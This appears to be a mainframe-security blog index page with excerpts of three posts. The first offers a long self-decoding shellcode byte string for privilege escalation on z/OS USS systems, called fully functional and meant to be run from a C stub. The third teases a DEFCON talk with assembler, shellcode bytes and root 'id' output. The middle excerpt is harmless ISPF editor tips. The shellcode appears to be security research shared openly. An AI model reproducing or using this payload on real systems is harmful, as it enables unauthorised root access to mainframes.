Shellcode Freebie!

Got a burning privesc vulnerable binary on your  USS? How about feeding it a little self-decoding shellcode?  (Hint this is fully functional, find a C stub and try it yourself!). “\x90\xec\xd0\x0c\xc0\xf0\xff\xff\xff\xfe\x18\xcf\x17\x11\x17\x22” “\x17\x33\xc2\x19\x01\x01\x01\x02\xc2\x29\x01\x01\x01\x03\x17\x12” “\x18\x41\x8b\x40\x10\x01\x17\xaa\x17\x22\xc0\xa1\xde\xad\xbe\xef” “\x18\xbc\x1a\xb1\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xfc\x1a\xb4” “\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xf6\x17\x22\x17\x33\x1a\xb1” “\x1b\xb4\x50\xd0\xb0\x04\x50\xb0\xd0\x08\x18\xdb\x18\x3b\x1a\x34” “\x1a\x34\x1a\x34\x1a\x34\x18\x53\x1b\x31\x18\x41\x17\x11\x17\x22” “\x97\x02\x30\x01\x1a\x14\xb9\xf8\x10\x23\x97\x02\x20\x01\xa7\x1e” “\x01\x70\xa7\x44\xff\xf9\x17\x44\x58\xd4\xb0\x04\x0d\xe5\xde\xad” “\xbe\xef\xde\xad\xbe\xef\xde\xad\xbe\xef\xde\xad\xbe\xef\x92\xe9” “\xd2\x0e\xc2\xf2\xfd\xfd\xfd\xfc\x5a\x02\xf2\x2a\x5a\xf2\xf2\x2e” “\x5a\xe2\x02\x12\x5a\xec\x01\x06\x5a\xec\x02\xa2\xb0\x1a\xe2\x02” “\xa5\xf6\x02\x05\x02\x02\x02\x12\x02\xda\x02\x02\x02\x04\x1a\xff” “\x1a\xd3\x52\xf2\xd2\x06\x52\xd2\xf2\x0a\x5a\x12\xf2\x1a\x43\xa2” “\x02\xda\x1c\xaf\x52\xa2\xd2\x4a\xc2\x32\x02\x02\x02\x75\xe9\xe9” “\xd2\x96\x02\x24\xc2\xb2\x02\x02\x02\x77\x43\x22\x02\x02\x52\x22” “\xd2\x82\x43\xe2\x02\x05\x52\xe2\xd2\x86\x43\xe2\xd2\x82\x52\xe2” “\xd2\x8a\x1a\xe0\x52\xe2\xd2\x92\xd0\x01\xd2\x92\xe2\x12\x5a\xe2” “\xd2\x92\xd0\x01\xd2\x92\xe0\x22\x5a\xe2\xd2\x92\xd0\x01\xd2\x92” “\xe2\x1a\x5a\xe2\xd2\x92\xd0\x01\xd2\x92\xe2\xe6\x5a\xe2\xd2\x8a” “\x1d\x02\x41\x02\xe2\x02\x5a\xf2\xd2\x92\x43\xe2\xd2\x82\x43\x42” “\xd2\x86\x43\x12\xd2\x4e\x52\x42\xd2\x4e\x1a\x49\x52\x42\xd2\x52” “\x52\xe2\xd2\x56\x52\x02\xd2\x5a\x52\x02\xd2\x5e\x52\xe2\xd2\x62” “\x52\x02\xd2\x66\x52\x02\xd2\x6a\x52\xe2\xd2\x6e\x52\x02\xd2\x72” “\x52\xe2\xd2\x76\x52\xe2\xd2\x7a\x52\xe2\xd2\x7e\xd0\x01\xd2\x0a”… Continue reading Shellcode Freebie!

Tips / Tricks – 7/2/15 (update)

Updated.  Added update to the packet capture section below, included pcap export! ISPF editor Want more real estate in your ISPF editor?   In an editing session enter EDSET in the command line, then check the line marked:   X Remove action bars in ISPF edit and view panels This will remove the menu bars and… Continue reading Tips / Tricks – 7/2/15 (update)

Mainframe shellcode

Come see my talk at DEFCON23. … SLR   14,14 MVC   32(4,13),16(14) L     14,32(,13) … \x1f\xee \xd2\x03\xd0\x20\xe0\x10 \x58\xe0\xd0\x20 … # id uid=0(IBMUSER) gid=0(SYS1) … Stay tuned to this site and follow @bigendiansmalls for sneak peeks at what I will be presenting!